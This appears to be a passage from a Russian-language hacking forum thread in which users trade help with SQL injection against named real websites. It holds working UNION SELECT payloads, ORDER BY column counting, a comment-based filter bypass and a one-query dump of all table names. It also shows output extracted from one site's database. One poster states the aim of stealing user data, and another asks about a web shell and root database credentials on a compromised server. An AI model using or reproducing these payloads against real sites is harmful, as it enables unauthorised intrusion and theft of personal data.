 |
|
09.02.2012, 13:22
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от ivan151
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)
где 666 - кол-во строк не более максимального значения в таблице.
|
|
|
09.02.2012, 14:51
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от ivan151
вобщем вот сайт http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,5--
всего для вывода 2 поля,ну допустим юзаю лимит и таким запросом http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,table_name+from+information _schema.tables+limit+0,1 пытаюсь узнать имена таблиц(мне нужны данные пользователей) и меняя лимит выводит другие таблицы вот например там есть:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
answer
но в какой таблице данные пользователей и как их вытащить? и ещё можно ли тут использовать ' UNION SELECT TOP 1 login FROM users-- и если да то как это должно выглядеть?
может лучше почитать мануал?
там все популярно расписано...
|
|
|
|
09.02.2012, 17:46
|
|
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами:
7530806
Репутация:
0
|
|
Всем Хай, вот есть сайт
http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
|
|
|
|
09.02.2012, 18:32
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от anonym_di
Всем Хай, вот есть сайт
http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
|
|
|
|
09.02.2012, 18:46
|
|
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами:
7530806
Репутация:
0
|
|
Сообщение от pirat0
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
как ты узнал кол-во табл??
|
|
|
|
09.02.2012, 18:50
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Смотри, там у тебя два запроса.
http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
Соответственно, кол-во = 26.
|
|
|
|
09.02.2012, 18:58
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от anonym_di
как ты узнал кол-во табл??
Сообщение от Ereee
Смотри, там у тебя два запроса.
http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
Соответственно, кол-во = 26.
амне показалось фильтрация идет
http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true
http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false
|
|
|
|
09.02.2012, 19:06
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Помогите со скулёй, чёт никак не выходит
Сообщение от None
http://www.porsche-spb.ru/model.phtml?id=13
|
|
|
|
09.02.2012, 19:09
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Сообщение от qaz
Помогите со скулёй, чёт никак не выходит
Код:
http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+
porsche_main@localhostorsche_main:5.5.19
Вроде все стандартно...
|
|
|
|
09.02.2012, 19:43
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол??
p.s. если конекчюсь не рутом, все норм, коннект происходит
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
